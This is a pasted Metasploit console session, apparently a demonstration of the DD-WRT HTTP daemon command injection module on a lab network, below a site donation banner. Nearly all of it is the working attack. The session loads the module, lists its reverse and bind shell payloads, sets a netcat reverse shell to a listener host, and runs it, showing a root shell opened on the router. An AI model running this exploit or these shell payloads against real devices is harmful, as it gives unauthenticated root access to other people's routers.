Thank you to anyone who has already donated - your generous donations helped make three months of treatment possible.

My brother Nate continues to fight stage IV Hodgkin's lymphoma. He's just 31, with a wife and baby girl. They have no active income (since he's been unable to return to work), no insurance, and cannot afford the treatment he needs. Nate and his family need your help. Please consider a donation, every dollar helps. Thanks.

Read Nate's story Support Nate by buying an official Pastie t-shirt Hide this message

Document@2x
|
Chain_link@2x
|
Arrow_down@2x
|
Spiral_paper@2x
A A A

Plain text       Report abuse 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91

msf3$ svn up
A    modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb
Updated to revision 6852.
hdm@vorpal:/downloads/msf19$ ./msfconsole 

                |                    |      _) |   
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __| 
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |   
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| 
                              _|                   


       =[ msf v3.3-dev
+ -- --=[ 401 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 176 aux

msf > use exploit/linux/http/ddwrt_cgibin_exec 
msf exploit(ddwrt_cgibin_exec) > info 

       Name: DD-WRT HTTP Daemon Arbitrary Command Execution
    Version: 6852
   Platform: Unix
 Privileged: No
    License: Metasploit Framework License (BSD)

Provided by:
  hdm <hdm@metasploit.com>

Available targets:
  Id  Name              
  --  ----              
  0   Automatic Target  

Basic options:
  Name   Current Setting  Required  Description         
  ----   ---------------  --------  -----------         
  RHOST  192.168.0.10     yes       The target address  
  RPORT  80               yes       The target port     

Payload information:
  Space: 1024

Description:
  This module abuses a metacharacter injection vulnerability in the 
  HTTP management server of wireless gateways running DD-WRT. This 
  flaw allows an unauthenticated attacker to execute arbitrary 
  commands as the root user account.

References:
  http://www.securityfocus.com/bid/35742
  http://www.milw0rm.com/exploits/9209

msf exploit(ddwrt_cgibin_exec) > show payloads 

Compatible payloads
===================

   Name                       Description                                      
   ----                       -----------                                      
   cmd/unix/bind_netcat       Unix Command Shell, Bind TCP (via netcat -e)     
   cmd/unix/bind_perl         Unix Command Shell, Bind TCP (via perl)          
   cmd/unix/bind_ruby         Unix Command Shell, Bind TCP (via Ruby)          
   cmd/unix/generic           Unix Command, Generic command execution          
   cmd/unix/reverse           Unix Command Shell, Double reverse TCP (telnet)  
   cmd/unix/reverse_bash      Unix Command Shell, Reverse TCP (/dev/tcp)       
   cmd/unix/reverse_netcat    Unix Command Shell, Reverse TCP (via netcat -e)  
   cmd/unix/reverse_perl      Unix Command Shell, Reverse TCP (via perl)       
   cmd/unix/reverse_ruby      Unix Command Shell, Reverse TCP (via Ruby)       
   generic/shell_bind_tcp     Generic Command Shell, Bind TCP Inline           
   generic/shell_reverse_tcp  Generic Command Shell, Reverse TCP Inline        

msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(ddwrt_cgibin_exec) > set LHOST 192.168.0.139 
LHOST => 192.168.0.139
msf exploit(ddwrt_cgibin_exec) > set LPORT 4444 
LPORT => 4444
msf exploit(ddwrt_cgibin_exec) > set RHOST 192.168.0.10
RHOST => 192.168.0.10
msf exploit(ddwrt_cgibin_exec) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Sending GET request with encoded command line...
[*] Command shell session 1 opened (192.168.0.139:4444 -> 192.168.0.10:2057)

id
uid=0(root) gid=0(root)
uname -a
Linux wifi1 2.4.36 #308 Sun Jul 27 16:11:05 CEST 2008 mips unknown